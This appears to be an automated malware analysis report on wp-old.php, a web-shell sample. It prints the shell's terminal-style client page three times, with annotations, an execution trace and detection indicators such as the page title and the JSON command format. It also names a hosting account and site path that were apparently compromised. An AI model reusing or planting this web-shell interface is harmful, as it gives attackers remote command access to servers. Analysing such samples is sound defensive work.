PHP Malware Analysis

wp-old.php

md5: 482a89d0d23d7ffca198ab0e16c97b58



Attributes

Emails
  • u431524636@nl-srv-web261.main-hosting.eu (HTML)

Title


Deobfuscated PHP code

<!doctype html>
<!--
  Web-shell client page from sample wp-old.php (md5 482a89d0d23d7ffca198ab0e16c97b58).
  The markup is only a terminal-style UI; the inline script below POSTs each typed
  line back to this same URL as JSON. No server-side PHP code is present in this
  listing, and the recorded execution trace shows only {main} running.
-->
<html>
<head>
    <!-- Fixed page title; a convenient string indicator for this sample. -->
    <title>Shell - ANSSIActive</title>
    <style>
    body {
        background: #000;
        color: #fff;
        font-family: monospace;
    }

    #terminal {
        position: fixed;
        left: 0;
        bottom: 2em;
        padding: 1em;
        width: calc(100% - 2em);
        max-height: calc(100% - 4em);
        margin: 0 auto;
        overflow-y: auto;
        overflow-x: hidden;
        white-space: pre-wrap;
        word-break: break-all;
    }

    #bottombar {
        position: fixed;
        left: 0;
        bottom: 0;
        width: 100%;
    }

    #ps1 {
        padding-left: 1em;
        line-height: 2em;
        height: 2em;
        float: left;
        max-width: 40%;
        padding-right: .5em;
    }

    #cursor {
        height: calc(2em - 1px);
        padding: 0;
        border: 0;
        float: left;
        min-width: 60%;
        max-width: 80%;
        background: #000;
        color: #fff;
        font-family: monospace;
        outline: none;
    }
    </style>
</head>
<body>
    
    <!-- Output pane; execCommand() appends prompt, command and server reply here via innerHTML. -->
    <pre id="terminal"></pre>
    <div id="bottombar">
        <!-- Prompt text, filled in by Terminal.ps1() once the script runs. -->
        <span id="ps1"></span>
        <!-- Command line; Enter submits, Up/Down walk the history (see attachCursor()). -->
        <input id="cursor" autofocus>
    </div>
    <!-- Inline client script; see the Terminal class for the request format it emits. -->
    <script>
    /**
     * Browser-side front end of the web shell.
     *
     * Everything here is presentational: the class draws a prompt, keeps a
     * command history and relays each typed line to the server with fetch().
     * The code that actually runs the command lives in a server-side handler
     * that is not part of this listing.
     */
    class Terminal {
        /**
         * Wires the UI up. The user, host and working directory shown in the
         * prompt are hard-coded literals (nothing is fetched from the server),
         * so they are stable strings for this particular sample.
         */
        constructor() {
            this.whoami = 'u431524636';
            this.hostname = 'nl-srv-web261.main-hosting.eu';
            this.pwd = '/home/u431524636/domains/marketscc.com/public_html';
            this.PATH_SEP = '/';
            this.commandHistory = [];                              // every submitted line, in order
            this.commandHistoryIndex = this.commandHistory.length; // position used by the Up/Down keys

            this.termWindow = document.getElementById('terminal'); // <pre> output pane
            this.cursor = document.getElementById('cursor');       // <input> command line
            this.ps1element = document.getElementById('ps1');      // <span> holding the prompt

            // The prompt is injected as HTML, not text (see ps1()).
            this.ps1element.innerHTML = this.ps1();

            this.attachCursor();

            // Disabled auto-run left by the author: no command is sent on page load.
            // this.execCommand('ifconfig');
        }

        /**
         * Resolves `path` to an absolute, normalised path string.
         *
         * Input that does not start with `/` or with an uppercase letter
         * followed by `:` (presumably a Windows drive) is taken as relative
         * to `this.pwd`. `.` segments are dropped, `..` pops the previous
         * segment (popping past the root is silently a no-op) and empty
         * segments of `path` are filtered out.
         *
         * Two quirks worth knowing when reading prompt output:
         *  - the leading empty segment of `this.pwd.split('/')` is NOT
         *    filtered, so a relative input yields a result that starts
         *    with a doubled separator;
         *  - a single remaining component is returned with a trailing
         *    separator (`/home/`), a multi-component path without one.
         *
         * @param {string} path  absolute or relative path
         * @returns {string} the normalised path
         */
        formatPath(path) {
            // No-op while PATH_SEP is '/'; only matters if the separator were changed.
            path = path.replace(/\//g, this.PATH_SEP);
            let curPathArr = !path.match(/^(([A-Z]\:)|(\/))/) ? this.pwd.split(this.PATH_SEP) : [];
            let pathArr = curPathArr.concat(path.split(this.PATH_SEP).filter(el => el));
            let absPath = [];

            pathArr.forEach(el => {
                if (el === '.') {
                    // Do nothing
                } else if (el === '..') {
                    absPath.pop();
                } else {
                    absPath.push(el);
                }
            });

            return this.PATH_SEP + (absPath.length === 1 ? absPath[0] + this.PATH_SEP : absPath.join(this.PATH_SEP));
        }

        /** @returns {string} `this.pwd` run through formatPath(). */
        getCurrentPath() {
            return this.formatPath(this.pwd);
        }

        /**
         * Replaces the working directory shown in the prompt.
         * Not called anywhere in this listing, so the displayed path never
         * changes client-side regardless of which commands are sent.
         * @param {string} newPath
         */
        updateCurrentPath(newPath) {
            this.pwd = this.formatPath(newPath);
        }

        /**
         * Binds the keyboard handling of the command line: Enter (13) submits
         * the current value, Up (38) and Down (40) walk the history. Relies on
         * the deprecated `keyCode` property.
         */
        attachCursor() {
            this.cursor.addEventListener('keyup', ({keyCode}) => {
                switch (keyCode) {
                    case 13:
                        // Submit first, then clear the line and re-render the prompt.
                        this.execCommand(this.cursor.value);
                        this.cursor.value = '';
                        this.ps1element.innerHTML = this.ps1();
                        this.commandHistoryIndex = this.commandHistory.length;
                        break;

                    case 38:
                        // Older entry; stops at index 0.
                        if (this.commandHistoryIndex !== 0) {
                            this.cursor.value = this.commandHistory[--this.commandHistoryIndex] || '';
                        }
                        break;

                    case 40:
                        // Newer entry; past the last one the line becomes empty.
                        if (this.commandHistoryIndex < this.commandHistory.length) {
                            this.cursor.value = this.commandHistory[++this.commandHistoryIndex] || '';
                        }
                        break;
                }
            });
        }

        /**
         * Builds the prompt as an HTML fragment (`user@host:path$ `) with
         * inline colours; callers assign it via innerHTML.
         * @returns {string}
         */
        ps1() {
            return `<span style="color:orange">${this.whoami}@${this.hostname}</span>:` +
                `<span style="color:limegreen">${this.getCurrentPath()}</span>$ `;
        }

        /**
         * Sends one command line to the server and appends the reply to the
         * output pane.
         *
         * Wire format, useful for detection: a POST to the page's own URL with
         * `Content-Type: application/json`, `Accept: application/json` and a
         * body of the shape `{"cmd": "<line>"}`; the reply is expected to be a
         * JSON object with a `response` field.
         *
         * The reply is concatenated into innerHTML without escaping, so the
         * server fully controls the HTML rendered in the pane. A failed fetch
         * is only logged: the rejection handler returns undefined, and the
         * `({response}) => ...` step then throws an uncaught TypeError.
         *
         * @param {string} cmd  the raw line typed by the user
         */
        execCommand(cmd) {
            this.commandHistory.push(cmd);

            fetch(document.location.href, {
                method: 'POST',
                headers: new Headers({
                    'Content-Type': 'application/json',
                    'Accept': 'application/json'
                }),
                body: JSON.stringify({
                    cmd
                })
            }).then(
                res => res.json(),
                err => console.error(err)
            ).then(({response}) => {
                // Prompt, echoed command and reply are appended as one HTML chunk.
                this.termWindow.innerHTML += `${this.ps1()}${cmd}<br>${response}`;

                // Keep the newest output in view.
                this.termWindow.scrollTop = this.termWindow.scrollHeight;
            })
        }
    }

    // Instantiate the terminal once the page has loaded; nothing else needs a
    // handle to the instance, so no reference is kept.
    window.addEventListener('load', function () {
        new Terminal();
    });
    </script>
</body>
</html>

Execution traces

data/traces/482a89d0d23d7ffca198ab0e16c97b58_trace-1676247758.029.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:23:03.926775]
1	0	1	0.000140	393528
1	3	0	0.000190	401248	{main}	1		/var/www/html/uploads/wp-old.php	0	0
1	3	1	0.000212	401360
			0.000258	314240
TRACE END   [2023-02-12 22:23:03.926923]


Generated HTML code

<!--
  Rendered DOM of the web-shell page (sample wp-old.php, md5 482a89d0d23d7ffca198ab0e16c97b58),
  evidently serialised after the inline script ran: the #ps1 span is already filled in and the
  boolean `autofocus` has been written out as autofocus="". No server-side PHP is present here.
-->
<html><head>
    <!-- Fixed page title; a convenient string indicator for this sample. -->
    <title>Shell - ANSSIActive</title>
    <style>
    body {
        background: #000;
        color: #fff;
        font-family: monospace;
    }

    #terminal {
        position: fixed;
        left: 0;
        bottom: 2em;
        padding: 1em;
        width: calc(100% - 2em);
        max-height: calc(100% - 4em);
        margin: 0 auto;
        overflow-y: auto;
        overflow-x: hidden;
        white-space: pre-wrap;
        word-break: break-all;
    }

    #bottombar {
        position: fixed;
        left: 0;
        bottom: 0;
        width: 100%;
    }

    #ps1 {
        padding-left: 1em;
        line-height: 2em;
        height: 2em;
        float: left;
        max-width: 40%;
        padding-right: .5em;
    }

    #cursor {
        height: calc(2em - 1px);
        padding: 0;
        border: 0;
        float: left;
        min-width: 60%;
        max-width: 80%;
        background: #000;
        color: #fff;
        font-family: monospace;
        outline: none;
    }
    </style>
</head>
<body>
    
    <!-- Output pane; execCommand() appends prompt, command and server reply here via innerHTML. -->
    <pre id="terminal"></pre>
    <div id="bottombar">
        <!-- Prompt as produced by Terminal.ps1(): the hard-coded user, host and path of this sample. -->
        <span id="ps1"><span style="color:orange">u431524636@nl-srv-web261.main-hosting.eu</span>:<span style="color:limegreen">/home/u431524636/domains/marketscc.com/public_html</span>$ </span>
        <!-- Command line; Enter submits, Up/Down walk the history (see attachCursor()). -->
        <input id="cursor" autofocus="">
    </div>
    <!-- Inline client script; see the Terminal class for the request format it emits. -->
    <script>
    /**
     * Browser-side front end of the web shell.
     *
     * Everything here is presentational: the class draws a prompt, keeps a
     * command history and relays each typed line to the server with fetch().
     * The code that actually runs the command lives in a server-side handler
     * that is not part of this listing.
     */
    class Terminal {
        /**
         * Wires the UI up. The user, host and working directory shown in the
         * prompt are hard-coded literals (nothing is fetched from the server),
         * so they are stable strings for this particular sample.
         */
        constructor() {
            this.whoami = 'u431524636';
            this.hostname = 'nl-srv-web261.main-hosting.eu';
            this.pwd = '/home/u431524636/domains/marketscc.com/public_html';
            this.PATH_SEP = '/';
            this.commandHistory = [];                              // every submitted line, in order
            this.commandHistoryIndex = this.commandHistory.length; // position used by the Up/Down keys

            this.termWindow = document.getElementById('terminal'); // <pre> output pane
            this.cursor = document.getElementById('cursor');       // <input> command line
            this.ps1element = document.getElementById('ps1');      // <span> holding the prompt

            // The prompt is injected as HTML, not text (see ps1()).
            this.ps1element.innerHTML = this.ps1();

            this.attachCursor();

            // Disabled auto-run left by the author: no command is sent on page load.
            // this.execCommand('ifconfig');
        }

        /**
         * Resolves `path` to an absolute, normalised path string.
         *
         * Input that does not start with `/` or with an uppercase letter
         * followed by `:` (presumably a Windows drive) is taken as relative
         * to `this.pwd`. `.` segments are dropped, `..` pops the previous
         * segment (popping past the root is silently a no-op) and empty
         * segments of `path` are filtered out.
         *
         * Two quirks worth knowing when reading prompt output:
         *  - the leading empty segment of `this.pwd.split('/')` is NOT
         *    filtered, so a relative input yields a result that starts
         *    with a doubled separator;
         *  - a single remaining component is returned with a trailing
         *    separator (`/home/`), a multi-component path without one.
         *
         * @param {string} path  absolute or relative path
         * @returns {string} the normalised path
         */
        formatPath(path) {
            // No-op while PATH_SEP is '/'; only matters if the separator were changed.
            path = path.replace(/\//g, this.PATH_SEP);
            let curPathArr = !path.match(/^(([A-Z]\:)|(\/))/) ? this.pwd.split(this.PATH_SEP) : [];
            let pathArr = curPathArr.concat(path.split(this.PATH_SEP).filter(el => el));
            let absPath = [];

            pathArr.forEach(el => {
                if (el === '.') {
                    // Do nothing
                } else if (el === '..') {
                    absPath.pop();
                } else {
                    absPath.push(el);
                }
            });

            return this.PATH_SEP + (absPath.length === 1 ? absPath[0] + this.PATH_SEP : absPath.join(this.PATH_SEP));
        }

        /** @returns {string} `this.pwd` run through formatPath(). */
        getCurrentPath() {
            return this.formatPath(this.pwd);
        }

        /**
         * Replaces the working directory shown in the prompt.
         * Not called anywhere in this listing, so the displayed path never
         * changes client-side regardless of which commands are sent.
         * @param {string} newPath
         */
        updateCurrentPath(newPath) {
            this.pwd = this.formatPath(newPath);
        }

        /**
         * Binds the keyboard handling of the command line: Enter (13) submits
         * the current value, Up (38) and Down (40) walk the history. Relies on
         * the deprecated `keyCode` property.
         */
        attachCursor() {
            this.cursor.addEventListener('keyup', ({keyCode}) => {
                switch (keyCode) {
                    case 13:
                        // Submit first, then clear the line and re-render the prompt.
                        this.execCommand(this.cursor.value);
                        this.cursor.value = '';
                        this.ps1element.innerHTML = this.ps1();
                        this.commandHistoryIndex = this.commandHistory.length;
                        break;

                    case 38:
                        // Older entry; stops at index 0.
                        if (this.commandHistoryIndex !== 0) {
                            this.cursor.value = this.commandHistory[--this.commandHistoryIndex] || '';
                        }
                        break;

                    case 40:
                        // Newer entry; past the last one the line becomes empty.
                        if (this.commandHistoryIndex < this.commandHistory.length) {
                            this.cursor.value = this.commandHistory[++this.commandHistoryIndex] || '';
                        }
                        break;
                }
            });
        }

        /**
         * Builds the prompt as an HTML fragment (`user@host:path$ `) with
         * inline colours; callers assign it via innerHTML.
         * @returns {string}
         */
        ps1() {
            return `<span style="color:orange">${this.whoami}@${this.hostname}</span>:` +
                `<span style="color:limegreen">${this.getCurrentPath()}</span>$ `;
        }

        /**
         * Sends one command line to the server and appends the reply to the
         * output pane.
         *
         * Wire format, useful for detection: a POST to the page's own URL with
         * `Content-Type: application/json`, `Accept: application/json` and a
         * body of the shape `{"cmd": "<line>"}`; the reply is expected to be a
         * JSON object with a `response` field.
         *
         * The reply is concatenated into innerHTML without escaping, so the
         * server fully controls the HTML rendered in the pane. A failed fetch
         * is only logged: the rejection handler returns undefined, and the
         * `({response}) => ...` step then throws an uncaught TypeError.
         *
         * @param {string} cmd  the raw line typed by the user
         */
        execCommand(cmd) {
            this.commandHistory.push(cmd);

            fetch(document.location.href, {
                method: 'POST',
                headers: new Headers({
                    'Content-Type': 'application/json',
                    'Accept': 'application/json'
                }),
                body: JSON.stringify({
                    cmd
                })
            }).then(
                res => res.json(),
                err => console.error(err)
            ).then(({response}) => {
                // Prompt, echoed command and reply are appended as one HTML chunk.
                this.termWindow.innerHTML += `${this.ps1()}${cmd}<br>${response}`;

                // Keep the newest output in view.
                this.termWindow.scrollTop = this.termWindow.scrollHeight;
            })
        }
    }

    // Instantiate the terminal once the page has loaded; nothing else needs a
    // handle to the instance, so no reference is kept.
    window.addEventListener('load', function () {
        new Terminal();
    });
    </script>


</body></html>

Original PHP code

<!doctype html>
<!--
  Web-shell client page from sample wp-old.php (md5 482a89d0d23d7ffca198ab0e16c97b58).
  The markup is only a terminal-style UI; the inline script below POSTs each typed
  line back to this same URL as JSON. No server-side PHP code is present in this
  listing, and the recorded execution trace shows only {main} running.
-->
<html>
<head>
    <!-- Fixed page title; a convenient string indicator for this sample. -->
    <title>Shell - ANSSIActive</title>
    <style>
    body {
        background: #000;
        color: #fff;
        font-family: monospace;
    }

    #terminal {
        position: fixed;
        left: 0;
        bottom: 2em;
        padding: 1em;
        width: calc(100% - 2em);
        max-height: calc(100% - 4em);
        margin: 0 auto;
        overflow-y: auto;
        overflow-x: hidden;
        white-space: pre-wrap;
        word-break: break-all;
    }

    #bottombar {
        position: fixed;
        left: 0;
        bottom: 0;
        width: 100%;
    }

    #ps1 {
        padding-left: 1em;
        line-height: 2em;
        height: 2em;
        float: left;
        max-width: 40%;
        padding-right: .5em;
    }

    #cursor {
        height: calc(2em - 1px);
        padding: 0;
        border: 0;
        float: left;
        min-width: 60%;
        max-width: 80%;
        background: #000;
        color: #fff;
        font-family: monospace;
        outline: none;
    }
    </style>
</head>
<body>
    
    <!-- Output pane; execCommand() appends prompt, command and server reply here via innerHTML. -->
    <pre id="terminal"></pre>
    <div id="bottombar">
        <!-- Prompt text, filled in by Terminal.ps1() once the script runs. -->
        <span id="ps1"></span>
        <!-- Command line; Enter submits, Up/Down walk the history (see attachCursor()). -->
        <input id="cursor" autofocus>
    </div>
    <!-- Inline client script; see the Terminal class for the request format it emits. -->
    <script>
    /**
     * Browser-side front end of the web shell.
     *
     * Everything here is presentational: the class draws a prompt, keeps a
     * command history and relays each typed line to the server with fetch().
     * The code that actually runs the command lives in a server-side handler
     * that is not part of this listing.
     */
    class Terminal {
        /**
         * Wires the UI up. The user, host and working directory shown in the
         * prompt are hard-coded literals (nothing is fetched from the server),
         * so they are stable strings for this particular sample.
         */
        constructor() {
            this.whoami = 'u431524636';
            this.hostname = 'nl-srv-web261.main-hosting.eu';
            this.pwd = '/home/u431524636/domains/marketscc.com/public_html';
            this.PATH_SEP = '/';
            this.commandHistory = [];                              // every submitted line, in order
            this.commandHistoryIndex = this.commandHistory.length; // position used by the Up/Down keys

            this.termWindow = document.getElementById('terminal'); // <pre> output pane
            this.cursor = document.getElementById('cursor');       // <input> command line
            this.ps1element = document.getElementById('ps1');      // <span> holding the prompt

            // The prompt is injected as HTML, not text (see ps1()).
            this.ps1element.innerHTML = this.ps1();

            this.attachCursor();

            // Disabled auto-run left by the author: no command is sent on page load.
            // this.execCommand('ifconfig');
        }

        /**
         * Resolves `path` to an absolute, normalised path string.
         *
         * Input that does not start with `/` or with an uppercase letter
         * followed by `:` (presumably a Windows drive) is taken as relative
         * to `this.pwd`. `.` segments are dropped, `..` pops the previous
         * segment (popping past the root is silently a no-op) and empty
         * segments of `path` are filtered out.
         *
         * Two quirks worth knowing when reading prompt output:
         *  - the leading empty segment of `this.pwd.split('/')` is NOT
         *    filtered, so a relative input yields a result that starts
         *    with a doubled separator;
         *  - a single remaining component is returned with a trailing
         *    separator (`/home/`), a multi-component path without one.
         *
         * @param {string} path  absolute or relative path
         * @returns {string} the normalised path
         */
        formatPath(path) {
            // No-op while PATH_SEP is '/'; only matters if the separator were changed.
            path = path.replace(/\//g, this.PATH_SEP);
            let curPathArr = !path.match(/^(([A-Z]\:)|(\/))/) ? this.pwd.split(this.PATH_SEP) : [];
            let pathArr = curPathArr.concat(path.split(this.PATH_SEP).filter(el => el));
            let absPath = [];

            pathArr.forEach(el => {
                if (el === '.') {
                    // Do nothing
                } else if (el === '..') {
                    absPath.pop();
                } else {
                    absPath.push(el);
                }
            });

            return this.PATH_SEP + (absPath.length === 1 ? absPath[0] + this.PATH_SEP : absPath.join(this.PATH_SEP));
        }

        /** @returns {string} `this.pwd` run through formatPath(). */
        getCurrentPath() {
            return this.formatPath(this.pwd);
        }

        /**
         * Replaces the working directory shown in the prompt.
         * Not called anywhere in this listing, so the displayed path never
         * changes client-side regardless of which commands are sent.
         * @param {string} newPath
         */
        updateCurrentPath(newPath) {
            this.pwd = this.formatPath(newPath);
        }

        /**
         * Binds the keyboard handling of the command line: Enter (13) submits
         * the current value, Up (38) and Down (40) walk the history. Relies on
         * the deprecated `keyCode` property.
         */
        attachCursor() {
            this.cursor.addEventListener('keyup', ({keyCode}) => {
                switch (keyCode) {
                    case 13:
                        // Submit first, then clear the line and re-render the prompt.
                        this.execCommand(this.cursor.value);
                        this.cursor.value = '';
                        this.ps1element.innerHTML = this.ps1();
                        this.commandHistoryIndex = this.commandHistory.length;
                        break;

                    case 38:
                        // Older entry; stops at index 0.
                        if (this.commandHistoryIndex !== 0) {
                            this.cursor.value = this.commandHistory[--this.commandHistoryIndex] || '';
                        }
                        break;

                    case 40:
                        // Newer entry; past the last one the line becomes empty.
                        if (this.commandHistoryIndex < this.commandHistory.length) {
                            this.cursor.value = this.commandHistory[++this.commandHistoryIndex] || '';
                        }
                        break;
                }
            });
        }

        /**
         * Builds the prompt as an HTML fragment (`user@host:path$ `) with
         * inline colours; callers assign it via innerHTML.
         * @returns {string}
         */
        ps1() {
            return `<span style="color:orange">${this.whoami}@${this.hostname}</span>:` +
                `<span style="color:limegreen">${this.getCurrentPath()}</span>$ `;
        }

        /**
         * Sends one command line to the server and appends the reply to the
         * output pane.
         *
         * Wire format, useful for detection: a POST to the page's own URL with
         * `Content-Type: application/json`, `Accept: application/json` and a
         * body of the shape `{"cmd": "<line>"}`; the reply is expected to be a
         * JSON object with a `response` field.
         *
         * The reply is concatenated into innerHTML without escaping, so the
         * server fully controls the HTML rendered in the pane. A failed fetch
         * is only logged: the rejection handler returns undefined, and the
         * `({response}) => ...` step then throws an uncaught TypeError.
         *
         * @param {string} cmd  the raw line typed by the user
         */
        execCommand(cmd) {
            this.commandHistory.push(cmd);

            fetch(document.location.href, {
                method: 'POST',
                headers: new Headers({
                    'Content-Type': 'application/json',
                    'Accept': 'application/json'
                }),
                body: JSON.stringify({
                    cmd
                })
            }).then(
                res => res.json(),
                err => console.error(err)
            ).then(({response}) => {
                // Prompt, echoed command and reply are appended as one HTML chunk.
                this.termWindow.innerHTML += `${this.ps1()}${cmd}<br>${response}`;

                // Keep the newest output in view.
                this.termWindow.scrollTop = this.termWindow.scrollHeight;
            })
        }
    }

    // Instantiate the terminal once the page has loaded; nothing else needs a
    // handle to the instance, so no reference is kept.
    window.addEventListener('load', function () {
        new Terminal();
    });
    </script>
</body>
</html>